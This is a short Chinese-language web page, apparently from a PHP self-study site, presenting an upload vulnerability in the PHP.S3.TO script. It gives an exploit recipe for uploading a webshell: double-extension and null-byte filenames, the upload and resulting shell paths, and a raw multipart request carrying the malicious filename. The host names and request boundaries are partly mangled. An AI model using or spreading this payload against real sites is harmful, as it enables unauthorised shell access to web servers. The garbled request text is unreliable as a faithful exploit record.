好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

PHP.S3.TO上传漏洞利用 - 网站安全 - 自学php

这个网页漏洞比较严重,可以直接获取shell,下面给出漏洞利用方法    漏洞信息:     可以任意上传PHP,TXT,JPG,PNG格式文件 change your shell to sh3ll.php.jpg or sh3ll.php%0%0.1.jpg     利用:     HdhCmsTest2cto测试数据 /[dir]/up/upload.php   加载的文件:   HdhCmsTest2cto测试数据 /[dir]/up/img/Sh3ll.php.jpg       漏洞 核心代码:  114782935826962\r\nContent-Disposition: form-data;   name="MAX_FILE_SIZE"\r\n\r\n1048576\r\n-1147829358 26962\r\nContent-Disposition: form-data;name="upfile"; filename="sh3ll.php.jpg"\r\nContent-Type: text/plain\r\n\r\n\r\n -----------------------------114782935826962\r\nContent-Disposition: form-data; name="pass"\r\n\r\n\r\n--114782935826962\r\nContent-Disposition:form-data; name="com"\r\n\r\n\r\n-----------------------------114782935826962--\r\n

查看更多关于PHP.S3.TO上传漏洞利用 - 网站安全 - 自学php的详细内容...

  阅读:36次